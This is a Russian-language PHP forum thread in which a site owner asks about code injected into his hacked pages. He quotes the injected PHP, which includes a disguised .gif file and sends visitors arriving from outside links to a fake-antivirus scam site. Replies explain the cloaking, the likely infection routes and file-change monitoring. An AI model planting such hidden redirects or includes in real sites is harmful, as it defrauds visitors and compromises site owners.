![]() |
|
Модераторы: skyboy, MoLeX, Aliance, ksnk |
![]()
|
|
| Chai |
|
||||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
Загружал уже давно в контент своего сайта обычные html-страницы. Решил пройтись с проверкой по контенту, смотрю, некоторые страницы были недавно изменены (по дате модификации выявил), а в конце (еще в теле, в самом конце) добавлены такие строки:
Кроме того, на сервер мне закинули директорию со страницами, раздающими некие сломанные программы) crack android navitel 5 5 crack cs4 illustrator crack finereader 10 crack genius driver И как часто сейчас встречаешь, типичные "комменты счастливых юзверей", вроде как А зачем при скачивании файла просит ввести номер? Это бесплатно!? Той же датой создания/модификации в корне лежал скриптовый файл *.js
Довески убрал, но чо за код был в конце страниц, что он делает? Может, где еще проверить надо? И какие функции выполнял скриптовый файл? Я хочу выяснить, может, еще кто проник, кто за свой собственный хостинг платить не хочет? Это сообщение отредактировал(а) Chai - 10.4.2013, 06:53 |
||||
|
|||||
| Чучмек |
|
|||
|
НЭТ БИЛЭТ ![]() ![]() Профиль Группа: Участник Сообщений: 841 Регистрация: 11.5.2008 Где: СССР Репутация: 4 Всего: 41 |
Chai, тебя взломали.
Проверяет откуда был переход - если переход был и не со страницы твоего сайта - перекидывает на base-file Это сообщение отредактировал(а) Чучмек - 10.4.2013, 11:34 -------------------- умную мысль держи при себе, а дурной - поделись с другими |
|||
|
||||
| Chai |
|
|||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
А почему им так важно, чтобы переход был не со страниц моего сайта? Что за ребятки эти?
Здесь он помечен в блэклисте. Так что я прям боюсь перейти, чтобы на них полюбоваться. Добавлено через 3 минуты и 44 секунды Блин, буду писать гневное письмо хостеру, что его антивирь, которым он регулярно проверяет контент, в упор не видит ни редиректов в хтакцессе, ни в этих довесках. |
|||
|
||||
| Sanchezzz |
|
|||
![]() Эксперт ![]() ![]() ![]() Профиль Группа: Завсегдатай Сообщений: 1670 Регистрация: 19.11.2006 Где: Voronezh Репутация: 41 Всего: 60 |
Ну скорее всего он ответит что у вас дрявые скрипты.
-------------------- Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS. |
|||
|
||||
| Chai |
|
|||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
Хех, там из скриптов есть только классический phpBB3. На эту отмазку напишу ихнему главному. Им уже написал. Зачем нужна такая проверка, если она не находит эти гадости? Чем они проверяют, не знаю, а только один раз нашли PHP-вирус, а эти не находят. А ведь достаточно посмотреть в блэклисты, они не скрываются.
|
|||
|
||||
| Чучмек |
|
|||
|
НЭТ БИЛЭТ ![]() ![]() Профиль Группа: Участник Сообщений: 841 Регистрация: 11.5.2008 Где: СССР Репутация: 4 Всего: 41 |
Чтобы ты не догадался. Если вести адрес в браузер и переходить со страницы на страницу - все Ок. А если перейти на твой сайт по внешней ссылке,с поисковика например, то перекинет. Добавлено через 3 минуты и 15 секунд А че боятся? Компьютер не взорвется. Говорят у вас типа вирусы и предлагают проверить комп за SMS. -------------------- умную мысль держи при себе, а дурной - поделись с другими |
|||
|
||||
| Sanchezzz |
|
|||
![]() Эксперт ![]() ![]() ![]() Профиль Группа: Завсегдатай Сообщений: 1670 Регистрация: 19.11.2006 Где: Voronezh Репутация: 41 Всего: 60 |
Чаще и за дырок форумов и закачивают шелы, особенно если они крякнутые=).
-------------------- Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS. |
|||
|
||||
| Chai |
|
|||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
Щас набрал в браузере адрес одной из страниц сайта и выполнил переход на нее.
Как она выглядит запечатлел во вложении, а код внизу нее такой <? require_once($_SERVER['DOCUMENT_ROOT'].'/group/case/mn_t.gif'); ?> <? if(isset($_SERVER['HTTP_REFERER']) && !preg_match("|^http://$_SERVER[HTTP_HOST]|i", $_SERVER['HTTP_REFERER'])){ exit( '<script>setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);</script>'); } ?></body> </html> Переход на base-file.com почему-то не выполнился. Почему? Присоединённый файл ( Кол-во скачиваний: 9 )
Низ_зараженной_страницы.JPG 12,35 Kb |
|||
|
||||
| krypt3r |
|
|||
|
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 359 Регистрация: 9.6.2009 Репутация: 3 Всего: 16 |
Кто крякнутый? Шелл или бесплатный phpBB? |
|||
|
||||
| MoLeX |
|
|||
![]() Местный пингвин ![]() ![]() ![]() ![]() Профиль Группа: Модератор Сообщений: 4076 Регистрация: 17.5.2007 Репутация: 46 Всего: 140 |
видно же что js скрипт не сработал.
-------------------- Amazing |
|||
|
||||
| Sanchezzz |
|
|||
![]() Эксперт ![]() ![]() ![]() Профиль Группа: Завсегдатай Сообщений: 1670 Регистрация: 19.11.2006 Где: Voronezh Репутация: 41 Всего: 60 |
Это в общем плане вы используете то что используют очень большое количество людей, каждая дырка даже в бесплатном форуме это угроза всему сайту.
Платные формы или крякнутые имеют уйму дыр. -------------------- Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS. |
|||
|
||||
| Chai |
|
|||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
А, точно, я ж его прибил в корне еще ранее. Мне щас коллега сказал, что на его форум новый юзер поимел права админа, потому что зашел в браузере в каком-то лине. Форум от SMF. Как это может быть, в линях что-то иначе исполняется? Это сообщение отредактировал(а) Chai - 11.4.2013, 15:17 |
|||
|
||||
| Aliance |
|
|||
![]() I ♥ <script> ![]() ![]() ![]() ![]() Профиль Группа: Модератор Сообщений: 6418 Регистрация: 2.8.2004 Где: spb Репутация: 14 Всего: 137 |
||||
|
||||
| Chai |
|
|||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
В линуксе.
|
|||
|
||||
| MoLeX |
|
|||
![]() Местный пингвин ![]() ![]() ![]() ![]() Профиль Группа: Модератор Сообщений: 4076 Регистрация: 17.5.2007 Репутация: 46 Всего: 140 |
))))))
взлом сайта через линкус. забавно -------------------- Amazing |
|||
|
||||
| cia |
|
|||
|
Бывалый ![]() Профиль Группа: Участник Сообщений: 207 Регистрация: 15.1.2007 Репутация: 4 Всего: 4 |
Между крякнутым софтом и не крякнутым нет никакой разницы, за исключением того, что софт крякнутый. На безопасности и работоспособности софта это никак не сказывается (конечно исключения бывают, но они чрезвычайно редки). Не слушайте что говорят производители лицензионного софта - у них зада заключается в продаже оного софта. Автор, проверь свой компьютер на вирусы и смени фтп-пароль. Дыры в пупулярных движках - это несомненно, но есть более часто встречаемый путь - вирус на сайт попадает с вашего компьютера: вы скачиваете троян, он дожидается когда вы подключаетесь к своему сайту и через интернет передаёт кому-то логин-пароль. Дальше робот выгружает вирус на ваш сайт. Этого никто не афиширует, но есть даже партнёрские программы по вирусному заражению. Добавлено через 1 минуту и 36 секунд Ага, забавно. И при этом ещё очень многие считают, что на сайтах linux вирусов вообще нет. |
|||
|
||||
| Chai |
|
|||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
Скорее всего троян сидит. Ходил на сайты, которые заражены HEUR:Trojan.Script.Generic или чем-то аналогичным. Выкачал весь htdocs на локальный комп с Каспервычем, но он вирусни не нашел. Или это результат удаление .js, или касперыч видит лишь работу в браузере.
|
|||
|
||||
| cia |
|
|||
|
Бывалый ![]() Профиль Группа: Участник Сообщений: 207 Регистрация: 15.1.2007 Репутация: 4 Всего: 4 |
Вирус - это и есть js-код.
|
|||
|
||||
| Arantir |
|
|||
|
Рыбак без удочки ![]() ![]() Профиль Группа: Участник Сообщений: 960 Регистрация: 18.11.2012 Репутация: 16 Всего: 55 |
Chai, почитайте про то, что такое вирусы, и о том, как работают антивирусы.
А то из ваших постов создается ощущение, что вы живете в сказочном мире, где есть только черное и белое. php и js — это скриптовые языки, для них "антивирусы" не помогут. По сути, все, что не задумано разработчиком прямо или косвенно, — вредоностный код. Но откуда антивирусу знать, влепил ли этот код сюда какой-то школьник-хакер или сам разработчик? Можно сделать бесконечный append пары строчек текста и от этого половина браузеров просто умрет при открытии сайта. Но вирусом это никогда не назовут. Никакая программа не заменит собственного мозга. Сделайте себе cron на проверку измения в файлах и просматривайте отчеты, а при потребности — изменения в файлах, сделанные не вами, если такие произойдут. В частности, настораживают вопросы на подобии Безусловно, человек и не может и не обязан знать все. Но, если вы решили вдаться в веб, то вам нужно заполнить очень много пробелов в своих познаниях в этой сфере. Если вы от этого далеки и вам просто нужен сайт — наймите для этого соответствующего специалиста. Ибо для новичка веб — это как поле граблей. -------------------- interface Жопа { // ATTENTION: has to be implemented by every class of the project for proper project work } |
|||
|
||||
| Chai |
|
||||||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
cia
Вирус - это и есть js-код. ___________ Удаленный файл .js был "штатным" файлом сайта. По дате его модификации я увидел, что кто-то в нем покопался, и все, что я смог увидеть инородного, это все тот же код
Вот весь файл
Как я понимаю, это форма поиска. Какой же кусок в нем имел критическое значение для исполнения всех зловредных инструкций на статических страницах контента? Добавлено через 4 минуты и 30 секунд
Я уже начал исполнять Ваши рекомендации. Это сообщение отредактировал(а) Chai - 18.4.2013, 07:06 |
||||||
|
|||||||
| Chai |
|
|||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
Насколько я понимаю, мне, как пользователю *nux, на сервере доступна только моя домашняя директория или пространство, к которому хостер-админ предоставил мне права доступа. Есть ли у меня доступ к демону cron, его настройкам и расписанию? |
|||
|
||||
| s0lman |
|
|||
|
Белый и лохматый ![]() ![]() Профиль Группа: Участник Сообщений: 637 Регистрация: 1.11.2007 Где: Ukraine Репутация: 9 Всего: 29 |
В админпанели должен быть крон доступен
-------------------- Когда я уже выучусь на волшебника? :( |
|||
|
||||
| Arantir |
|
|||
|
Рыбак без удочки ![]() ![]() Профиль Группа: Участник Сообщений: 960 Регистрация: 18.11.2012 Репутация: 16 Всего: 55 |
Кажется, я только сейчас заметил, что кул-хацкер пытается добавить php-код с помощью JavaScript. lol... На что надеялся тот, кто добавлял эти "зловредные" строчки? На то, что по стечению обстоятельств и настроек сервера в js-файлах исполняется php-код? У пользователя он то уж точно не выполнится.
Вы слишком узко смотрите на проблему. А если ваш сайт и есть блэк-лист? Антивирус его тогда вообще с концами удалить должен из-за кучи ссылок на вредные сайты... В блэк-листах есть самые разнообразные сайты. В том числе клоны, фишинговые и т.п. Может вы просто разместили у себя ссылку на клон своего сайта с предупреждением о том, что это подделка под ваш сайт и призываете посетителей не пользоваться таким сайтом. Ссылка — это всего лишь ссылка. Антивирус ничего не обязан с ней делать. -------------------- interface Жопа { // ATTENTION: has to be implemented by every class of the project for proper project work } |
|||
|
||||
![]()
|
| Правила форума "PHP" | |
|
|
Новичкам:
Важно:
Внимание:
Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers. |
| 0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей) | |
| 0 Пользователей: | |
| « Предыдущая тема | PHP: Общие вопросы | Следующая тема » |
|
|
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности Powered by Invision Power Board(R) 1.3 © 2003 IPS, Inc. |